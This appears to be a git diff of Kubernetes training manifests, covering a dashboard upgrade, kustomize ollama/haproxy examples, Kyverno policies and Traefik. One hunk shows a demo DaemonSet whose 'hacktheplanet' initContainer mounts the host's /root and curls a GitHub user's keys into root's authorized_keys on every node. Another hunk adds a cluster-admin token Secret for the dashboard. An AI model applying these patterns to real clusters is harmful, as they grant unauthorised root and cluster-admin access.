     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 rules:
@@ -182,8 +182,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 roleRef:
@@ -204,8 +204,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
     kubernetes.io/cluster-service: "true"
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
@@ -229,8 +229,8 @@ metadata:
     app.kubernetes.io/instance: kubernetes-dashboard
     app.kubernetes.io/managed-by: Helm
     app.kubernetes.io/name: kubernetes-dashboard
-    app.kubernetes.io/version: 2.5.0
-    helm.sh/chart: kubernetes-dashboard-5.2.0
+    app.kubernetes.io/version: 2.7.0
+    helm.sh/chart: kubernetes-dashboard-6.0.0
   name: kubernetes-dashboard
   namespace: kubernetes-dashboard
 spec:
@@ -253,15 +253,15 @@ spec:
       app.kubernetes.io/instance: kubernetes-dashboard
       app.kubernetes.io/managed-by: Helm
      app.kubernetes.io/name: kubernetes-dashboard
-      app.kubernetes.io/version: 2.5.0
-      helm.sh/chart: kubernetes-dashboard-5.2.0
+      app.kubernetes.io/version: 2.7.0
+      helm.sh/chart: kubernetes-dashboard-6.0.0
     spec:
       containers:
       - args:
         - --namespace=kubernetes-dashboard
         - --auto-generate-certificates
         - --sidecar-host=http://127.0.0.1:8000
-        image: kubernetesui/dashboard:v2.5.0
+        image: kubernetesui/dashboard:v2.7.0
         imagePullPolicy: IfNotPresent
         livenessProbe:
           httpGet:
@@ -292,7 +292,7 @@ spec:
           name: kubernetes-dashboard-certs
         - mountPath: /tmp
           name: tmp-volume
-      - image: kubernetesui/metrics-scraper:v1.0.7
+      - image: kubernetesui/metrics-scraper:v1.0.8
         imagePullPolicy: IfNotPresent
         livenessProbe:
           httpGet:
@@ -344,3 +344,12 @@ metadata:
   creationTimestamp: null
   name: cluster-admin
   namespace: kubernetes-dashboard
+---
+apiVersion: v1
+kind: Secret
+type: kubernetes.io/service-account-token
+metadata:
+  name: cluster-admin-token
+  namespace: kubernetes-dashboard
+  annotations:
+    kubernetes.io/service-account.name: cluster-admin
@@ -16,8 +16,7 @@ spec:
         hostPath:
           path: /root
       tolerations:
-      - effect: NoSchedule
-        operator: Exists
+      - operator: Exists
       initContainers:
       - name: hacktheplanet
         image: alpine
@@ -27,7 +26,7 @@ spec:
         command:
         - sh
         - -c
-        - "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
+        - "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
       containers:
      - name: web
         image: nginx
@@ -12,5 +12,5 @@ listen very-basic-load-balancer
     server blue color.blue.svc:80
     server green color.green.svc:80
 
-# Note: the services above must exist,
-# otherwise HAproxy won't start.
+### Note: the services above must exist,
+### otherwise HAproxy won't start.
@@ -1,5 +1,5 @@
 kind: HorizontalPodAutoscaler
-apiVersion: autoscaling/v2beta2
+apiVersion: autoscaling/v2
 metadata:
   name: rng
 spec:
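autoscaling/v2beta2 was removed in Kubernetes 1.26, and autoscaling/v2 uses the same spec layout, so only the apiVersion needs to change. The rest of this manifest isn't shown in the diff; an illustrative complete v2 spec for rng could look like this (everything below scaleTargetRef is an assumption, not the repo's actual values):

kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2
metadata:
  name: rng
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: rng
  minReplicas: 1                    # illustrative bounds
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50      # illustrative target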
@@ -0,0 +1,12 @@
# This removes the haproxy Deployment.

apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component

patches:
- patch: |-
    $patch: delete
    kind: Deployment
    apiVersion: apps/v1
    metadata:
      name: haproxy
@@ -0,0 +1,14 @@
apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component

# Within a Kustomization, it is not possible to specify in which
# order transformations (patches, replacements, etc.) should be
# executed. If we want to execute transformations in a specific
# order, one possibility is to put them in individual components,
# and then invoke these components in the order we want.
# It works, but it creates an extra level of indirection, which
# reduces readability and complicates maintenance.

components:
- setup
- cleanup
@@ -0,0 +1,20 @@
global
    #log stdout format raw local0
    #daemon
    maxconn 32
defaults
    #log global
    timeout client 1h
    timeout connect 1h
    timeout server 1h
    mode http
    option abortonclose
frontend metrics
    bind :9000
    http-request use-service prometheus-exporter
frontend ollama_frontend
    bind :8000
    default_backend ollama_backend
    maxconn 16
backend ollama_backend
    server ollama_server localhost:11434 check
@@ -0,0 +1,39 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: haproxy
  name: haproxy
spec:
  selector:
    matchLabels:
      app: haproxy
  template:
    metadata:
      labels:
        app: haproxy
    spec:
      volumes:
      - name: haproxy
        configMap:
          name: haproxy
      containers:
      - image: haproxy:3.0
        name: haproxy
        volumeMounts:
        - name: haproxy
          mountPath: /usr/local/etc/haproxy
        readinessProbe:
          httpGet:
            port: 9000
        ports:
        - name: haproxy
          containerPort: 8000
        - name: metrics
          containerPort: 9000
        resources:
          requests:
            cpu: 0.05
          limits:
            cpu: 1
@@ -0,0 +1,75 @@
# This adds a sidecar to the ollama Deployment, by taking
# the pod template and volumes from the haproxy Deployment.
# The idea is to allow running ollama+haproxy in two modes:
# - separately (each with their own Deployment),
# - together in the same Pod, sidecar-style.
# The YAML files define how to run them separately, and this
# "replacements" directive fetches a specific volume and
# a specific container from the haproxy Deployment, to add
# them to the ollama Deployment.
#
# This would be simpler if kustomize allowed appending to or
# merging lists in "replacements"; but it doesn't seem to be
# possible at the moment.
#
# It would be even better if kustomize allowed performing
# a strategic merge using a fieldPath as the source, because
# we could merge both the containers and the volumes in a
# single operation.
#
# Note that technically, it might be possible to layer
# multiple kustomizations so that one generates the patch
# to be used in another; but it wouldn't be very readable
# or maintainable, so we decided not to do that right now.
#
# However, the current approach (fetching fields one by one)
# has an advantage: it could let us transform the haproxy
# container into a real sidecar (i.e. an initContainer with
# a restartPolicy=Always).

apiVersion: kustomize.config.k8s.io/v1alpha1
kind: Component

resources:
- haproxy.yaml

configMapGenerator:
- name: haproxy
  files:
  - haproxy.cfg

replacements:
- source:
    kind: Deployment
    name: haproxy
    fieldPath: spec.template.spec.volumes.[name=haproxy]
  targets:
  - select:
      kind: Deployment
      name: ollama
    fieldPaths:
    - spec.template.spec.volumes.[name=haproxy]
    options:
      create: true
- source:
    kind: Deployment
    name: haproxy
    fieldPath: spec.template.spec.containers.[name=haproxy]
  targets:
  - select:
      kind: Deployment
      name: ollama
    fieldPaths:
    - spec.template.spec.containers.[name=haproxy]
    options:
      create: true
- source:
    kind: Deployment
    name: haproxy
    fieldPath: spec.template.spec.containers.[name=haproxy].ports.[name=haproxy].containerPort
  targets:
  - select:
      kind: Service
      name: ollama
    fieldPaths:
    - spec.ports.[name=11434].targetPort
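Following up on the last comment above: on clusters where native sidecars are available, a variant of the container replacement could copy the haproxy container into initContainers instead. This is a hypothetical sketch mirroring the replacement pattern used in this component (the restartPolicy: Always field would still have to be patched in separately, since the source container doesn't carry it):

- source:
    kind: Deployment
    name: haproxy
    fieldPath: spec.template.spec.containers.[name=haproxy]
  targets:
  - select:
      kind: Deployment
      name: ollama
    fieldPaths:
    - spec.template.spec.initContainers.[name=haproxy]
    options:
      create: true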
k8s/kustomize-examples/ollama-with-sidecar/blue.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: blue
  name: blue
spec:
  replicas: 2
  selector:
    matchLabels:
      app: blue
  template:
    metadata:
      labels:
        app: blue
    spec:
      containers:
      - image: jpetazzo/color
        name: color
        ports:
        - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: blue
  name: blue
spec:
  ports:
  - port: 80
  selector:
    app: blue
@@ -0,0 +1,94 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization

# Each of these YAML files contains a Deployment and a Service.
# The blue.yaml file is here just to demonstrate that the rest
# of this Kustomization can be precisely scoped to the ollama
# Deployment (and Service): the blue Deployment and Service
# shouldn't be affected by our kustomize transformers.
resources:
- ollama.yaml
- blue.yaml

buildMetadata:

# Add a label app.kubernetes.io/managed-by=kustomize-vX.Y.Z
- managedByLabel

# Add an annotation config.kubernetes.io/origin, indicating:
# - which file defined that resource;
# - if it comes from a git repository, which one, and which
#   ref (tag, branch...) it was.
- originAnnotations

# Add an annotation alpha.config.kubernetes.io/transformations
# indicating which patches and other transformers have changed
# each resource.
- transformerAnnotations

# Let's generate a ConfigMap with literal values.
# Note that this will actually add a suffix to the name of the
# ConfigMaps (e.g.: ollama-8bk8bd8m76) and it will update all
# references to the ConfigMap (e.g. in Deployment manifests)
# accordingly. The suffix is a hash of the ConfigMap contents,
# so that basically, if the ConfigMap is edited, any workload
# using that ConfigMap will automatically do a rolling update.
configMapGenerator:
- name: ollama
  literals:
  - "model=gemma3:270m"
  - "prompt=If you visit Paris, I suggest that you"
  - "queue=4"

patches:
# The Deployment manifest in ollama.yaml doesn't specify
# resource requests and limits, so that it can run on any
# cluster (including resource-constrained local clusters
# like KiND or minikube). The example below adds CPU
# requests and limits using a strategic merge patch.
# The patch is inlined here, but it could also be put
# in a file and referenced with "path: xxxxxx.yaml".
- patch: |
    apiVersion: apps/v1
    kind: Deployment
    metadata:
      name: ollama
    spec:
      template:
        spec:
          containers:
          - name: ollama
            resources:
              requests:
                cpu: 1
              limits:
                cpu: 2
# This would have the same effect, with one little detail:
# JSON patches cannot specify containers by name, so this
# assumes that the ollama container is the first one in
# the pod template (whereas the strategic merge patch can
# use "merge keys" and identify containers by their name).
#- target:
#    kind: Deployment
#    name: ollama
#  patch: |
#    - op: add
#      path: /spec/template/spec/containers/0/resources
#      value:
#        requests:
#          cpu: 1
#        limits:
#          cpu: 2

# A "component" is a bit like a "base", in the sense that
# it lets us define some reusable resources and behaviors.
# There is a key difference, though:
# - a "base" will be evaluated in isolation: it will
#   generate+transform some resources, then these resources
#   will be included in the main Kustomization;
# - a "component" has access to all the resources that
#   have been generated by the main Kustomization, which
#   means that it can transform them (with patches etc).
components:
- add-haproxy-sidecar
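To make the configMapGenerator comment concrete, the generated ConfigMap comes out looking roughly like this (the hash suffix varies with the data; the one below reuses the example value from the comment):

apiVersion: v1
kind: ConfigMap
metadata:
  name: ollama-8bk8bd8m76    # suffix is a hash of the data below
data:
  model: "gemma3:270m"
  prompt: "If you visit Paris, I suggest that you"
  queue: "4"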
k8s/kustomize-examples/ollama-with-sidecar/ollama.yaml (new file, 73 lines)
@@ -0,0 +1,73 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: ollama
  name: ollama
spec:
  selector:
    matchLabels:
      app: ollama
  template:
    metadata:
      labels:
        app: ollama
    spec:
      volumes:
      - name: ollama
        hostPath:
          path: /opt/ollama
          type: DirectoryOrCreate
      containers:
      - image: ollama/ollama
        name: ollama
        env:
        - name: OLLAMA_MAX_QUEUE
          valueFrom:
            configMapKeyRef:
              name: ollama
              key: queue
        - name: MODEL
          valueFrom:
            configMapKeyRef:
              name: ollama
              key: model
        volumeMounts:
        - name: ollama
          mountPath: /root/.ollama
        lifecycle:
          postStart:
            exec:
              command:
              - /bin/sh
              - -c
              - ollama pull $MODEL
        livenessProbe:
          httpGet:
            port: 11434
        readinessProbe:
          exec:
            command:
            - /bin/sh
            - -c
            - ollama show $MODEL
        ports:
        - name: ollama
          containerPort: 11434
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: ollama
  name: ollama
spec:
  ports:
  - name: "11434"
    port: 11434
    protocol: TCP
    targetPort: 11434
  selector:
    app: ollama
  type: ClusterIP
@@ -0,0 +1,5 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices
- redis
@@ -0,0 +1,13 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- microservices.yaml
transformers:
- |
  apiVersion: builtin
  kind: PrefixSuffixTransformer
  metadata:
    name: use-ghcr-io
  prefix: ghcr.io/
  fieldSpecs:
  - path: spec/template/spec/containers/image
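The transformer prepends ghcr.io/ to every image under spec/template/spec/containers, so after building this Kustomization each container in microservices.yaml comes out like this:

      containers:
      - name: rng
        image: ghcr.io/dockercoins/rng:v0.1   # was dockercoins/rng:v0.1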
@@ -0,0 +1,125 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  replicas: 1
  selector:
    matchLabels:
      app: hasher
  template:
    metadata:
      labels:
        app: hasher
    spec:
      containers:
      - image: dockercoins/hasher:v0.1
        name: hasher
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: hasher
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: rng
  name: rng
spec:
  replicas: 1
  selector:
    matchLabels:
      app: rng
  template:
    metadata:
      labels:
        app: rng
    spec:
      containers:
      - image: dockercoins/rng:v0.1
        name: rng
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: rng
  name: rng
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: rng
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: webui
  name: webui
spec:
  replicas: 1
  selector:
    matchLabels:
      app: webui
  template:
    metadata:
      labels:
        app: webui
    spec:
      containers:
      - image: dockercoins/webui:v0.1
        name: webui
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: webui
  name: webui
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: webui
  type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: worker
  name: worker
spec:
  replicas: 1
  selector:
    matchLabels:
      app: worker
  template:
    metadata:
      labels:
        app: worker
    spec:
      containers:
      - image: dockercoins/worker:v0.1
        name: worker
@@ -0,0 +1,4 @@
|
||||
apiVersion: kustomize.config.k8s.io/v1beta1
|
||||
kind: Kustomization
|
||||
resources:
|
||||
- redis.yaml
|
||||
@@ -0,0 +1,35 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
@@ -0,0 +1,160 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
@@ -0,0 +1,30 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- dockercoins.yaml
replacements:
- sourceValue: ghcr.io/dockercoins
  targets:
  - select:
      kind: Deployment
      labelSelector: "app in (hasher,rng,webui,worker)"
    # It will soon be possible to use regexes in replacement selectors,
    # meaning that the "labelSelector:" above can be replaced with the
    # following "name:" selector which is a tiny bit simpler:
    #name: hasher|rng|webui|worker
    # Regex support in replacement selectors was added by this PR:
    # https://github.com/kubernetes-sigs/kustomize/pull/5863
    # This PR was merged in August 2025, but as of October 2025, the
    # latest release of Kustomize is 5.7.1, which was released in July.
    # Hopefully the feature will be available in the next release :)
    # Another possibility would be to select all Deployments, and then
    # reject the one(s) for which we don't want to update the registry;
    # for instance:
    #reject:
    #  kind: Deployment
    #  name: redis
    fieldPaths:
    - spec.template.spec.containers.*.image
    options:
      delimiter: "/"
      index: 0
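This replacement splits each image reference on `/` and replaces element 0, so `dockercoins/hasher:v0.1` becomes `ghcr.io/dockercoins/hasher:v0.1`, while the `redis` Deployment (whose `app` label doesn't match the selector) keeps its image untouched. A quick way to check (a sketch, run from the directory containing this kustomization):

```bash
# The four dockercoins images should now point at ghcr.io;
# "image: redis" should be unchanged.
kubectl kustomize . | grep "image:"
```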
@@ -3,7 +3,6 @@ kind: ClusterPolicy
 metadata:
   name: pod-color-policy-1
 spec:
-  validationFailureAction: enforce
   rules:
   - name: ensure-pod-color-is-valid
     match:
@@ -18,5 +17,6 @@ spec:
           operator: NotIn
           values: [ red, green, blue ]
       validate:
+        failureAction: Enforce
         message: "If it exists, the label color must be red, green, or blue."
         deny: {}
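To see `pod-color-policy-1` in action, try creating a pod with a `color` label outside the allowed list; with enforcement on, the admission request should be denied with the message above. A sketch (pod names and image are arbitrary):

```bash
# Should be rejected: "purple" is not in [red, green, blue].
kubectl run test-color --image=nginx --labels=color=purple

# Should be admitted.
kubectl run test-color --image=nginx --labels=color=blue
```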
@@ -3,7 +3,6 @@ kind: ClusterPolicy
 metadata:
   name: pod-color-policy-2
 spec:
-  validationFailureAction: enforce
   background: false
   rules:
   - name: prevent-color-change
@@ -15,13 +14,14 @@ spec:
         - key: "{{ request.operation }}"
           operator: Equals
           value: UPDATE
-        - key: "{{ request.oldObject.metadata.labels.color }}"
+        - key: "{{ request.oldObject.metadata.labels.color || '' }}"
           operator: NotEquals
           value: ""
-        - key: "{{ request.object.metadata.labels.color }}"
+        - key: "{{ request.object.metadata.labels.color || '' }}"
           operator: NotEquals
           value: ""
       validate:
+        failureAction: Enforce
         message: "Once label color has been added, it cannot be changed."
         deny:
           conditions:
@@ -3,7 +3,6 @@ kind: ClusterPolicy
 metadata:
   name: pod-color-policy-3
 spec:
-  validationFailureAction: enforce
   background: false
   rules:
   - name: prevent-color-change
@@ -15,14 +14,13 @@ spec:
         - key: "{{ request.operation }}"
           operator: Equals
           value: UPDATE
-        - key: "{{ request.oldObject.metadata.labels.color }}"
+        - key: "{{ request.oldObject.metadata.labels.color || '' }}"
           operator: NotEquals
           value: ""
-        - key: "{{ request.object.metadata.labels.color }}"
+        - key: "{{ request.object.metadata.labels.color || '' }}"
           operator: Equals
           value: ""
       validate:
+        failureAction: Enforce
         message: "Once label color has been added, it cannot be removed."
         deny:
           conditions:
13  k8s/pod-disruption-budget.yaml  Normal file
@@ -0,0 +1,13 @@
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
  name: my-pdb
spec:
  #minAvailable: 2
  #minAvailable: 90%
  maxUnavailable: 1
  #maxUnavailable: 10%
  selector:
    matchLabels:
      app: my-app
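With `maxUnavailable: 1`, voluntary disruptions (node drains, API-initiated evictions) can only take down one matching pod at a time. To check the budget's current state (assuming some workload's pods carry the `app: my-app` label):

```bash
# Shows minimum available / maximum unavailable and allowed disruptions.
kubectl get pdb my-pdb
# Just the number of voluntary disruptions currently allowed.
kubectl get pdb my-pdb -o jsonpath='{.status.disruptionsAllowed}'
```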
27  k8s/sysctl.yaml  Normal file
@@ -0,0 +1,27 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: sysctl
spec:
  selector:
    matchLabels:
      app: sysctl
  template:
    metadata:
      labels:
        app: sysctl
    spec:
      tolerations:
      - operator: Exists
      initContainers:
      - name: sysctl
        image: alpine
        securityContext:
          privileged: true
        command:
        - sysctl
        - fs.inotify.max_user_instances=99999
      containers:
      - name: pause
        image: registry.k8s.io/pause:3.8
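The privileged init container sets the sysctl on every node, then the pause container keeps the pod alive. To confirm that it ran (a sketch, assuming the DaemonSet was applied in `kube-system`, as `konk.sh` does further down):

```bash
# The init container prints the assignment it performed, i.e.
# "fs.inotify.max_user_instances = 99999".
kubectl logs --namespace kube-system daemonset/sysctl -c sysctl
```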
@@ -1,87 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
  labels:
    k8s-app: traefik-ingress-lb
spec:
  selector:
    matchLabels:
      k8s-app: traefik-ingress-lb
  template:
    metadata:
      labels:
        k8s-app: traefik-ingress-lb
      name: traefik-ingress-lb
    spec:
      tolerations:
      - effect: NoSchedule
        operator: Exists
      hostNetwork: true
      serviceAccountName: traefik-ingress-controller
      terminationGracePeriodSeconds: 60
      containers:
      - image: traefik:1.7
        name: traefik-ingress-lb
        ports:
        - name: http
          containerPort: 80
          hostPort: 80
        - name: admin
          containerPort: 8080
          hostPort: 8080
        securityContext:
          capabilities:
            drop:
            - ALL
            add:
            - NET_BIND_SERVICE
        args:
        - --api
        - --kubernetes
        - --logLevel=INFO
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: traefik-ingress-controller
rules:
- apiGroups:
  - ""
  resources:
  - services
  - endpoints
  - secrets
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - extensions
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: traefik-ingress-controller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
  name: traefik-ingress-controller
  namespace: kube-system
@@ -1,114 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
  name: traefik-ingress-controller
  namespace: kube-system
  labels:
    k8s-app: traefik-ingress-lb
spec:
  selector:
    matchLabels:
      k8s-app: traefik-ingress-lb
  template:
    metadata:
      labels:
        k8s-app: traefik-ingress-lb
      name: traefik-ingress-lb
    spec:
      tolerations:
      - effect: NoSchedule
        operator: Exists
      hostNetwork: true
      serviceAccountName: traefik-ingress-controller
      terminationGracePeriodSeconds: 60
      containers:
      - image: traefik:v2.5
        name: traefik-ingress-lb
        ports:
        - name: http
          containerPort: 80
          hostPort: 80
        - name: https
          containerPort: 443
          hostPort: 443
        - name: admin
          containerPort: 8080
          hostPort: 8080
        securityContext:
          capabilities:
            drop:
            - ALL
            add:
            - NET_BIND_SERVICE
        args:
        - --accesslog
        - --api
        - --api.insecure
        - --log.level=INFO
        - --metrics.prometheus
        - --providers.kubernetesingress
        - --entrypoints.http.Address=:80
        - --entrypoints.https.Address=:443
        - --entrypoints.https.http.tls.certResolver=default
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: traefik-ingress-controller
rules:
- apiGroups:
  - ""
  resources:
  - services
  - endpoints
  - secrets
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - extensions
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - networking.k8s.io
  resources:
  - ingresses
  - ingressclasses
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: traefik-ingress-controller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
  name: traefik-ingress-controller
  namespace: kube-system
---
kind: IngressClass
apiVersion: networking.k8s.io/v1
metadata:
  name: traefik
  annotations:
    ingressclass.kubernetes.io/is-default-class: "true"
spec:
  controller: traefik.io/ingress-controller
@@ -1 +0,0 @@
traefik-v2.yaml
123  k8s/traefik.yaml  Normal file
@@ -0,0 +1,123 @@
---
apiVersion: v1
kind: Namespace
metadata:
  name: traefik
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: traefik
  namespace: traefik
---
kind: DaemonSet
apiVersion: apps/v1
metadata:
  name: traefik
  namespace: traefik
  labels:
    app: traefik
spec:
  selector:
    matchLabels:
      app: traefik
  template:
    metadata:
      labels:
        app: traefik
      name: traefik
    spec:
      tolerations:
      - effect: NoSchedule
        operator: Exists
      # If, for some reason, our CNI plugin doesn't support hostPort,
      # we can enable hostNetwork instead. That should work everywhere
      # but it doesn't provide the same isolation.
      #hostNetwork: true
      serviceAccountName: traefik
      terminationGracePeriodSeconds: 60
      containers:
      - image: traefik:v3.5
        name: traefik
        ports:
        - name: http
          containerPort: 80
          hostPort: 80
        - name: https
          containerPort: 443
          hostPort: 443
        - name: admin
          containerPort: 8080
          hostPort: 8080
        securityContext:
          capabilities:
            drop:
            - ALL
            add:
            - NET_BIND_SERVICE
        args:
        - --accesslog
        - --api
        - --api.insecure
        - --entrypoints.http.Address=:80
        - --entrypoints.https.Address=:443
        - --global.sendAnonymousUsage=true
        - --log.level=INFO
        - --metrics.prometheus
        - --providers.kubernetesingress
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: traefik
rules:
- apiGroups:
  - ""
  resources:
  - services
  - endpoints
  - secrets
  - nodes
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - networking.k8s.io
  resources:
  - ingresses
  - ingressclasses
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - discovery.k8s.io
  resources:
  - endpointslices
  verbs:
  - get
  - list
  - watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: traefik
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: traefik
subjects:
- kind: ServiceAccount
  name: traefik
  namespace: traefik
---
kind: IngressClass
apiVersion: networking.k8s.io/v1
metadata:
  name: traefik
  annotations:
